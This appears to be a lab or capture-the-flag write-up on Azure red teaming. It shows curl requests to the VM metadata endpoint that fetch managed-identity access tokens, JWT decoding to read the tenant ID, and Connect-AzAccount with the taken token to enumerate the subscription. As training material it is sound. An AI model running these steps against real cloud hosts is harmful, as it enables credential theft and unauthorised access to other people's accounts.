Azure Cloud Red Teaming

1. What is the subdomain of the “atomic-nuclear.site” organisation that hosts an app on an Azure VM?

https://urlscan.io/search/#atomic-nuclear.site

Answer

internal.atomic-nuclear.site 

2. What is the “iss” claim in the JWT token of the VM metadata?

Get the JWT token

Payload: curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"

Decode the JWT token

Answer

https://sts.windows.net/143198c4-77be-42f7-b18e-95c5b693e6b9/

3. What is the tenant id of the organization?

Read the token again and look up the tenant ID.

Answer

143198c4-77be-42f7-b18e-95c5b693e6b9
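
The decoding step behind questions 2 and 3, as an added example that is not part of the original write-up: it takes the JSON returned by the metadata token endpoint, base64url-decodes the JWT payload and reads "iss" and the tenant GUID from it. The sample response is constructed (only the issuer value comes from the answers above), the function names are hypothetical, and the signature is not verified, so this inspects claims only.

```python
import base64
import json

ISSUER_PREFIX = "https://sts.windows.net/"

def b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url with the padding stripped; restore it first.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def decode_claims(token: str) -> dict:
    """Return the payload claims of a JWT without verifying its signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    return json.loads(b64url_decode(parts[1]))

def claims_from_imds_response(body: str) -> dict:
    """Pull the access_token out of the token endpoint's JSON and decode it."""
    return decode_claims(json.loads(body)["access_token"])

def tenant_id(claims: dict) -> str:
    """Tenant GUID from an issuer of the form https://sts.windows.net/<tenant>/."""
    iss = claims["iss"]
    if not iss.startswith(ISSUER_PREFIX):
        raise ValueError(f"unexpected issuer: {iss}")
    tenant = iss[len(ISSUER_PREFIX):].strip("/")
    # If a "tid" claim is present it has to agree with the issuer.
    if claims.get("tid", tenant) != tenant:
        raise ValueError("tid claim does not match issuer")
    return tenant

def build_sample_response() -> str:
    # Constructed sample: same shape as the endpoint's reply, dummy signature.
    tenant = "143198c4-77be-42f7-b18e-95c5b693e6b9"
    header = {"typ": "JWT", "alg": "RS256"}
    payload = {"aud": "https://graph.microsoft.com/", "iss": ISSUER_PREFIX + tenant + "/", "tid": tenant}
    segs = [b64url_encode(json.dumps(x).encode()) for x in (header, payload)]
    token = ".".join(segs + [b64url_encode(b"constructed-signature")])
    return json.dumps({"access_token": token, "token_type": "Bearer"})

if __name__ == "__main__":
    claims = claims_from_imds_response(build_sample_response())
    print("iss:", claims["iss"])
    print("tenant id:", tenant_id(claims))
```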

4. What is the subscription ID/name where the vulnerable app is hosted on the VM?

1) Create a new token

Payload: curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

2) Run the command

┌──(kali㉿kali)-[/home/kali/Desktop/scripts]
└─PS> Connect-AzAccount -AccessToken <access token from step 1> -AccountId 143198c4-77be-42f7-b18e-95c5b693e6b9

Subscription name Tenant
----------------- ------
Demo-Lab-Testing  143198c4-77be-42f7-b18e-95c5b693e6b9

Answer

Demo-Lab-Testing